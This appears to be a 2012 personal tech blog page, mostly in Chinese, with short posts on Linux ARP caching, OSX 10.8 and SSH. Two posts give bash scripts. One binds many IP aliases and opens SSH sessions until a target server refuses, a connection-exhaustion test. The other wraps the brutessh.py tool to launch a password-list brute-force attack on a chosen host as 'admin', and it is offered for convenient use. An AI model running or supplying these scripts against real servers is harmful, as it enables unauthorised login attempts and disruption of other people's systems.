Friday, February 24, 2012

如何增加Linux arp cache entry

好文章,先收藏起來。

Thursday, February 16, 2012

OSX 10.8 Mountain Lion~

你能相信嗎?OSX 10.8要發佈了!Lion真是史上最短的OSX。

如何測試SSH Server可接受的未經授權的最大連線數?

寫了一個簡單的script如下,去做測試然而目前只支援Class C,可以改善的空間應該還不少。
#!/bin/bash

# Bind IP
read -p "Which interface? [eth0]: " INTERFACE
read -p "Net address: [10.10.10] " NETIP
read -p "Min IP address: [1] " MiIP
read -p "Max IP address:[254] " MaIP

for((i="$MiIP";i<="$MaIP";i++))
do
ip addr add "$NETIP"."$i"/24 dev $INTERFACE 1>/dev/null 2>1
done
echo ""

# Start to test
read -p "Target: [10.10.10.10] " TARGET
i=$MiIP
num=1

echo ""
echo "Preparing for test target: $TARGET"
sleep 5

while true;
do
ssh admin@$TARGET -o StrictHostKeyChecking=no -b "$NETIP"."$i" 1>/dev/null 2>1 &
sleep 1
netstat -an | grep 22 | grep ESTABLISHED | grep "\<$NETIP"."$i\>"
if [ `echo $?` -ne 0 ]; then
num=$(($num-1))
echo "The maximum SSH session of $TARGET is $num"
kill `ps aux | grep "\<22\>" | grep -v grep | grep -v ssh-agent | awk -F" " '{print $2}'` > /dev/null
break
else
echo "SSH session number $num is established!"
i=$(($i+1))
num=$(($num+1))
fi
done

exit



Wednesday, February 15, 2012

SSH Brute Force attack tools

Here it is: http://zeldor.biz/2011/01/how-to-bruteforce-ssh/

And I'v wrote a bash script to make it more easy to use as following:
1 #!/bin/bash
2
3 read -p "Please enter your target host: " HOST
4 echo "Enter run to launch SSH Brute Force Attack, or exit to leave it."
5
6 echo -n "[run/exit]? "
7 while read LINE;
8 do
9 if [ $LINE = "run" ]; then
10 clear
11 python /root/bin/brutessh/brutessh.py -h $HOST -u admin -d /root/bin/brutessh/passlist.txt &
12 sleep 10
13 echo -n "***** Enter exit can stop SSH Brute Force attack immediately or rerun it again. ***** [run/exit]? "
14 continue
15 elif [ $LINE = "exit" ]; then
16 kill `ps aux | grep brutessh.py | grep -v grep |awk -F" " '{ print $2 }'` 2> /dev/null
17 break
18 fi
19 done

Please to adjust /root/bin/brutessh/ above to work with your environment.

Thanks to Igor Drobot (http://zeldor.biz/about/ blog author) and laramies (brutessh author).